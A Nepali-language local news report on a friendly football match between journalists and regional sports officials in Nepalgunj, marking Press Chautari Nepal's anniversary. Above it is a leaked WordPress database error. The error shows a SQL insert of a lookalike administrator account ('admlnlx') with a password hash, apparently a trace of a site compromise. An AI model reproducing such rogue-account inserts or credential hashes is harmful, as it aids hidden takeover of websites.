WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BuYH.f1cTF7oVVrCKEYNM9gktGknkr/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 09:18:45', '', 'admlnlx', 'admlnlx')
नेपालगन्ज,माघ २३-
प्रेस चौतारी नेपालको १९ औं स्थापना दिवशको अवसरमा आईतबार नेपालगन्ज रंगशालामा मैत्रीपूर्ण फुटवल प्रतियोगिता सम्पन्न भएको छ । पत्रकार र मध्यपश्चिम क्षेत्रीय खेलकुद विकास समितिका पदाधिकारी, प्रशिक्षकबीच भएको सो प्रतियोगितामा खेलकुदका पदाधिकारी,प्रशिक्षकको टिम बिजयी भएको छ ।
खेलकुद पदाधिकारी, प्रशिक्षकको टिमले पांच गोल हानेको थियो भने पत्रकारको टिमले चार गोल हानेको थियो । खेलकुद पदाधिकारी, प्रशिक्षकको तर्फबाट रविन श्रेष्ठ–२, भिम ओली–१, सत्य चौधरी–१, सानु तामाङ्गले १ गोल गरेका थिए । पत्रकारको तर्फबाट निरज गौतमले २ र भगतराम थारुले २ गोल फर्काएका थिए ।
बिजयी टिमलाई प्रेस चौतारी बाकेको तर्फबाट नेकपा एमालेका केन्द्रीय प्रचार बिभाग सदस्य डिल्ली बिसी, नेकपा एमाले बा“केका प्रचार बिभाग प्रमुख किस्मत कक्षपति, प्रेस चौतारी बाके अध्यक्ष हेमन्त बिकले सम्मान गरेका थिए । सो अवसरमा बोल्दै मध्यपशिचम क्षेत्रीय खेलकुद विकास समितिका अध्यक्ष भिम ओलीले मैत्रीपूर्ण फुटवल प्रतियोगिताले पत्रकार र खेलजगतबीत सौहार्दता बढाएको र घोषणा भइसकेको राष्ट्रिय खेलकुद प्रतियोगितालाई प्रचारप्रसार गर्ने सहयोग पुग्ने बताए ।

प्रतियोगिता अघि प्रेस चौतारी नेपालको १९ औं स्थापना दिवशको अवसरमा केक काटिएको थियो । सो अवसरमा प्रेस चौतारी नेपालको अनुशासन आयोग अध्यक्ष जे पाण्डे, चौतारी केन्द्रीय सदस्य भेषराज बस्नेत, नेपाल पत्रकार महासंघका केन्द्रीय सदस्य झलक गैरे, नेपाल पत्रकार महासंघका बा“के अध्यक्ष रुद्र सुवदी, प्रेस चौतारी बांकेका सल्लाहकारहरु शिव डोटेल,मोहमद हारुन, जनक नेपाल, सुरेन्द्र काफ्ले, ठाकुरसिंह थारु, अक्षरी पोख्रेल, राजकुमार श्रेष्ठ, नेपाल पत्रकार महासंघ बाकेका पूर्व अध्यक्ष निरज गौतम, प्रेस सेन्टरका प्रदेश सह–सचिव प्रदिप वाग्ले, जिल्ला अध्यक्ष डक्ट धिताल, प्रेस युनियन बा“केका पूर्व अध्यक्ष नरेन्द्र थापा लगायत अग्रज पत्रकार, मध्यपश्चिम क्षेत्रीय खेलकुद विकास समितिका पदाधिकारी, प्रशिक्षक खेलाडी लगायतको सहभागिता रहेको थियो ।